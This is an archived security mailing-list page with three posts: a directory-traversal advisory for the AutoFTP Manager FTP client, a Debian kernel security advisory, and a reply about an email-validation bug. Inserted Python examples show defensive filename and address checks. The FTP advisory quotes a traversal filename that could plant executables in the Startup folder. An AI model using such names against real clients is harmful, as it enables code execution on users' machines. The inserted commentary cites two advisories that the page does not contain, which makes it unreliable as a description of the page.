Presentation Submissions: presentati...@ruxcon.org.au
General Enquiries: rux...@ruxcon.org.au




Directory Traversal in AutoFTP Manager

2010-08-23 Thread advisory
Vulnerability ID: HTB22566
Reference: 
http://www.htbridge.ch/advisory/directory_traversal_in_autoftp_manager.html
Product: AutoFTP Manager
Vendor: DeskShare ( http://www.deskshare.com/afm.aspx ) 
Vulnerable Version: 4.31 and Probably Prior Versions
Vendor Notification: 05 August 2010 
Vulnerability Type: File Content Disclosure
Status: Fixed by Vendor
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
When exploited, this vulnerability allows an anonymous attacker to write files 
to specified locations on a user's system.

The FTP client does not properly sanitise filenames containing directory 
traversal sequences that are received from an FTP server, for example
a file named "..\..\..\..\..\..\..\somefile.exe".

By tricking a user into downloading a directory from a malicious FTP server that 
contains files with backslash directory traversal sequences in their filenames, 
an attacker can potentially write files into the user's Startup folder to execute 
malicious code when the user logs on.

Solution: Upgrade to the most recent version
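
The three High-Tech Bridge advisories in this digest (FTPGetter, 3D FTP
Client, AutoFTP Manager) describe one bug class: the client treats a
server-supplied filename as a path. The following is an added Python
illustration, not code from any of those products or from the advisories. The
traversal filename is the one quoted in the posts; the download directory and
the other sample names are constructed. It shows the weak approach (a
basename() that understands only one separator) beside a rejecting validator.

```python
"""Vetting server-supplied filenames before an FTP client writes them locally.

Added illustration, not code from FTPGetter, 3D FTP Client or AutoFTP Manager.
The traversal filename is the one quoted in the advisories; the download
directory and the other sample names are constructed.
"""
import os
import posixpath
from typing import Optional

# Anything that could act as a separator, drive prefix or terminator on the
# platforms the client might run on. Rejected outright rather than stripped.
_FORBIDDEN = set('\\/:*?"<>|\x00')


def naive_local_name(server_supplied: str) -> str:
    """The weakness the advisories describe, in miniature: a basename() that
    knows only '/' lets '..\\..\\' sequences through untouched."""
    return posixpath.basename(server_supplied)


def safe_local_name(server_supplied: str) -> Optional[str]:
    """Accept the name only as an opaque leaf; return None to skip the file."""
    name = server_supplied
    if not name or name in (".", "..") or name != name.strip():
        return None
    if any(ch in _FORBIDDEN for ch in name):
        return None
    if name != name.rstrip(". "):      # Windows silently drops trailing dots
        return None
    return name


def destination_path(download_dir: str, server_supplied: str) -> Optional[str]:
    """Join a vetted name onto the download directory and re-check containment."""
    name = safe_local_name(server_supplied)
    if name is None:
        return None
    root = os.path.abspath(download_dir)
    target = os.path.abspath(os.path.join(root, name))
    # Defence in depth: the file must land directly inside the download dir.
    if os.path.dirname(target) != root:
        return None
    return target


if __name__ == "__main__":
    sample = "..\\..\\..\\..\\..\\..\\..\\somefile.exe"   # from the advisories
    print("naive:", naive_local_name(sample))
    print("safe: ", safe_local_name(sample))
    print("dest: ", destination_path("downloads", "report.txt"))
```

Rejecting rather than rewriting matters: a client that strips "..\" and keeps
going will happily write "somefile.exe" into its download directory, which is
still attacker-chosen content, but at least not into the Startup folder.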



[SECURITY] [DSA 2094-1] New Linux 2.6.26 packages fix several issues

2010-08-23 Thread dann frazier
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA-2094-1                     secur...@debian.org
http://www.debian.org/security/                               dann frazier
August 19, 2010                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: linux-2.6
Vulnerability  : privilege escalation/denial of service/information leak
Problem type   : local
Debian-specific: no
CVE Id(s)  : CVE-2009-4895 CVE-2010-2226 CVE-2010-2240 CVE-2010-2248
 CVE-2010-2521 CVE-2010-2798 CVE-2010-2803 CVE-2010-2959
 CVE-2010-3015
Debian Bug(s)  : 589179
 
Several vulnerabilities have been discovered in the Linux kernel that
may lead to a denial of service or privilege escalation. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2009-4895

Kyle Bader reported an issue in the tty subsystem that allows local
users to create a denial of service (NULL pointer dereference).

CVE-2010-2226

Dan Rosenberg reported an issue in the xfs filesystem that allows local
users to copy and read a file owned by another user, for which they
only have write permissions, due to a lack of permission checking in the
XFS_SWAPEXT ioctl.

CVE-2010-2240

Rafal Wojtczuk reported an issue that allows users to obtain escalated
privileges. Users must already have sufficient privileges to execute or
connect clients to an Xorg server.

CVE-2010-2248

Suresh Jayaraman discovered an issue in the CIFS filesystem. A malicious
file server can set an incorrect "CountHigh" value, resulting in a
denial of service (BUG_ON() assertion).

CVE-2010-2521

Neil Brown reported an issue in the NFSv4 server code. A malicious client
could trigger a denial of service (Oops) on a server due to a bug in
the read_buf() routine.

CVE-2010-2798

Bob Peterson reported an issue in the GFS2 file system. A file system
user could cause a denial of service (Oops) via certain rename
operations.

CVE-2010-2803

Kees Cook reported an issue in the DRM (Direct Rendering Manager)
subsystem. Local users with sufficient privileges (local X users
or members of the 'video' group on a default Debian install) could
acquire access to sensitive kernel memory.

CVE-2010-2959

Ben Hawkes discovered an issue in the AF_CAN socket family. An integer
overflow condition may allow local users to obtain elevated privileges.

CVE-2010-3015

Toshiyuki Okajima reported an issue in the ext4 filesystem. Local users
could trigger a denial of service (BUG assertion) by generating a specific
set of filesystem operations.

This update also includes a fix for a regression introduced by a previous
update. See the referenced Debian bug page for details.

For the stable distribution (lenny), this problem has been fixed in
version 2.6.26-24lenny1.

We recommend that you upgrade your linux-2.6 and user-mode-linux
packages.

The following matrix lists additional source packages that were
rebuilt for compatibility with or to take advantage of this update:

 Debian 5.0 (lenny)
 user-mode-linux 2.6.26-1um-2+24lenny1

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, armel, hppa, i386, ia64, mipsel, 
powerpc, s390 and sparc.
Updates for arm and mips will be released as they become available.

Source archives:

  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-24lenny1.dsc
Size/MD5 checksum: 5778 0ce8e36117eece3c4b469d73be862cd3
  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz
Size/MD5 checksum: 61818969 85e039c2588d5bf3cb781d1c9218bbcb
  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-24lenny1.diff.gz
Size/MD5 checksum:  7952972 d3496a509cd9024910b5ee2cad4b5c70

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.26_2.6.26-24lenny1_all.deb
Size/MD5 checksum: 48766186 ae5653c62cd9e1631c02af9ebab6a93d
  
http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-24lenny1_all.deb
Size/MD5 checksum:  4630140 1ae9b5193a604a5943cbe3580d5f8191
  
http://security.debian.org/pool/updates/main/

Re: Web Tool Announcement: ismymailsecure.com

2010-08-23 Thread Chuck Swiger
Hi, Holger--

On Aug 18, 2010, at 2:59 AM, Holger Rabbach wrote:
> I am happy to announce the immediate availability of a web based email
> security testing tool at http://www.ismymailsecure.com.  [ ... ]
> If you have any concerns about having to enter a full email address,
> please be advised that this address is never stored anywhere. The only
> reason that the site asks for an email address rather than a domain is
> that it makes it easier for end-users to enter the correct information.
> Feel free to enter anything you like as the left hand part of the
> address, as it will be immediately stripped off by the tool anyway.

Your tool doesn't implement RFC-822 (2822/3696) address-checking properly; it 
returns:

  "cswiger+t...@mac.com is an invalid email address"

Regards,
-- 
-Chuck
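
The reply's complaint is a common one: a validator that rejects a plus-tagged
local part is stricter than the address grammar it claims to enforce. The
block below is an added Python illustration, not the ismymailsecure.com tool's
code. It implements the RFC 5322 dot-atom form of the local part (RFC 5322
obsoletes the 2822 the reply cites), with '+' accepted because it is in the
atext character set; quoted local parts are deliberately left out. The sample
addresses are constructed.

```python
"""Address syntax check that accepts plus-addressed local parts.

Added illustration, not the ismymailsecure.com tool's code. Implements the
RFC 5322 dot-atom local part only (no quoted-string form); the sample
addresses are constructed.
"""
import re
from typing import Optional, Tuple

# RFC 5322 atext: the characters permitted in an unquoted local-part atom.
# '+' is in this set, which is what makes user+tag@ addresses valid.
_ATEXT = r"[A-Za-z0-9!#$%&'*+/=?^_`{|}~-]"
_DOT_ATOM = rf"{_ATEXT}+(?:\.{_ATEXT}+)*"
# Hostname labels: 1-63 chars, letters/digits/hyphen, no leading/trailing hyphen.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# At least one dot: a domain-level mail check wants a mail domain, not a bare host.
_DOMAIN = rf"{_LABEL}(?:\.{_LABEL})+"
_ADDRESS = re.compile(rf"^({_DOT_ATOM})@({_DOMAIN})\Z")


def parse_address(addr: str) -> Optional[Tuple[str, str]]:
    """Return (local_part, domain) or None if the syntax is unacceptable."""
    if len(addr) > 254:
        return None
    m = _ADDRESS.match(addr)
    if not m:
        return None
    local, domain = m.groups()
    if len(local) > 64:          # RFC 5321 local-part length limit
        return None
    return local, domain


def domain_for_mail_check(addr: str) -> Optional[str]:
    """What a domain-level mail-security test actually needs: the domain,
    lower-cased, with the whole local part (plus-tag included) discarded."""
    parsed = parse_address(addr)
    return parsed[1].lower() if parsed else None


if __name__ == "__main__":
    for sample in ("user+tag@example.com", "user..dots@example.com"):
        print(sample, "->", parse_address(sample))
```

Since the tool only keeps the domain, the right fix is to be lenient about the
local part and strict about the domain, which is the split the two functions
above make.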